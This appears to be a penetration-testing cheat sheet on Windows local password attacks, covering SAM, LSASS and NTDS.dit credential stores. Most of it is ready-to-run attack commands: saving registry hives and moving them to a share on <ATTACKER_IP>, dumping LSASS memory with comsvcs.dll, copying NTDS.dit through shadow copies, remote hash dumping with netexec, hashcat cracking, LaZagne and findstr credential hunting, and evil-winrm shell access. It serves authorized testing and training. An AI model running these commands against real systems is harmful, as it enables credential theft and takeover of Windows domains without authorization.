Windows Local Password Attacks

Credential Storage Mechanisms

Security Account Manager (SAM) Database

Purpose: Stores local account password hashes on standalone Windows systems
Location: Registry hives: hklm\sam, hklm\system, hklm\security
Scope: Local user accounts on individual Windows machines
Functionality:
- Stores password hashes for local user accounts
- Allows offline extraction and cracking of password hashes
- Primary credential store for non-domain-joined computers

Local Security Authority Subsystem Service (LSASS)

Purpose: Central credential management process in Windows
Location: lsass.exe in Windows system processes
Functionality:
- Caches credentials locally in memory
- Creates and manages access tokens
- Handles authentication processes
- Stores credentials for:
  - Currently logged-in users
  - Cached domain credentials
  - Service account credentials
Security Implications:
- Primary target for credential dumping attacks
- Stores credentials in memory in various formats
- Can retain credentials even after user logout

NT Directory Services (NTDS.dit)

Purpose: Primary database for Active Directory domain controllers
Location: %SystemRoot%\NTDS\NTDS.dit
Scope: Enterprise-wide credential storage in Windows domain environments
Functionality:
- Stores user account information for entire Windows domain
- Contains:
  - User account credentials
  - Group Policy information
  - Domain controller configuration
  - Replication metadata
- Centralized authentication mechanism for domain-joined computers
- Enables domain-wide login and access control
Key Characteristics:
- Encrypted at rest
- Requires specific extraction techniques
- Contains more comprehensive user information compared to SAM database

SAM Database Attack Methodology

Registry Hive Extraction

Requires Administrative Privileges
Extracts critical registry hives containing password hashes

Command to Save Hives:

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Transferring Hives to Attack Host

Set Up SMB Server:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /path/to/save

Move Hive Files:

move sam.save \\<ATTACKER_IP>\CompData
move system.save \\<ATTACKER_IP>\CompData
move security.save \\<ATTACKER_IP>\CompData

Hash Extraction with Impacket

Uses Impacket's secretsdump.py to extract password hashes

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

LSASS Memory Dumping Methods

Method 1: Memory Dump Creation with Task Manager (GUI)

Task Manager Method (GUI)
- Steps:
  1. Open Task Manager.
  2. Go to the Processes tab.
  3. Find and right-click lsass.exe.
  4. Select Create dump file.
- File Location: C:\Users\<loggedonuser>\AppData\Local\Temp\lsass.DMP
- Transfer: Use file transfer methods (e.g., discussed in Attacking SAM).

Method 2: Memory Dump Creation with Rundll32.exe & Comsvcs.dll (CLI)

Retrieve lsass.exe PID with :
- Command Prompt:
  tasklist /svc | findstr lsass
- PowerShell:
  Get-Process lsass
Use rundll32.exe with comsvcs.dll to create memory dump

rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

Note:
- Flagged by most modern AV tools.
- AV bypass techniques may be required.

Credential Extraction

Uses Pypykatz to parse and extract credentials from memory dump

pypykatz lsa minidump /path/to/lsass.dmp

Active Directory (NTDS.dit) Attacks

Dictionary Attack

Attempts authentication using a list of potential passwords

netexec smb <DC_IP> -u <username> -p <password_list>

NTDS.dit Capture Methods

Volume Shadow Copy:

vssadmin create shadow /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit
cmd.exe /c move C:\NTDS\NTDS.dit \\<attack_host_IP>\<share_name>

CrackMapExec Method:

netexec smb <DC_IP> -u <username> -p <password> --ntds

Cracking Hashes with Hashcat

Prepare Hash File (hashestocrack.txt):

64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0

Crack Hashes:

sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Credential Hunting Commands

Lazagne Credential Extraction

Comprehensive tool for extracting credentials from various applications

lazagne.exe all
# Verbose mode
lazagne.exe all -vv

Findstr Credential Search

Searches files for potential credential-related strings

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Key Terms for Credential Discovery

Generic: password, passphrase, keys, username, creds, users, pwd, login, credentials
Application-specific: configuration, dbcredential, dbpassword, passkeys, passphrases

Remote Authentication Attacks

CrackMapExec Remote Attacks

Dump LSA Secrets:

netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --lsa

Dump SAM Remotely:

netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --sam

Dump NTDS Remotely:

netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --ntds

Post-Compromise Enumeration

Local Group Membership

net localgroup

User Privileges

net user <username>

Remote Shell Access

evil-winrm -i <DC_IP> -u <username> -p <password>

Key Considerations

Requires administrative or elevated privileges
Most techniques are detectable by modern antivirus
Potential to trigger security alerts
Ethical use limited to authorized penetration testing

Defensive Recommendations

Implement strong password policies
Use multi-factor authentication
Regularly update and patch systems
Monitor and log authentication events

PreviousRemote Password Attacks NextLinux Local Password Attacks

hashtagCredential Storage Mechanisms

hashtagSecurity Account Manager (SAM) Database

hashtagLocal Security Authority Subsystem Service (LSASS)

hashtagNT Directory Services (NTDS.dit)

hashtagSAM Database Attack Methodology

hashtagRegistry Hive Extraction

hashtagTransferring Hives to Attack Host

hashtagHash Extraction with Impacket

hashtagLSASS Memory Dumping Methods

hashtagMethod 1: Memory Dump Creation with Task Manager (GUI)

hashtagMethod 2: Memory Dump Creation with Rundll32.exe & Comsvcs.dll (CLI)

hashtagCredential Extraction

hashtagActive Directory (NTDS.dit) Attacks

hashtagDictionary Attack

hashtagNTDS.dit Capture Methods

hashtagCracking Hashes with Hashcat

hashtagCredential Hunting Commands

hashtagLazagne Credential Extraction

hashtagFindstr Credential Search

hashtagKey Terms for Credential Discovery

hashtagRemote Authentication Attacks

hashtagCrackMapExec Remote Attacks

hashtagPost-Compromise Enumeration

hashtagLocal Group Membership

hashtagUser Privileges

hashtagRemote Shell Access

hashtagKey Considerations

hashtagDefensive Recommendations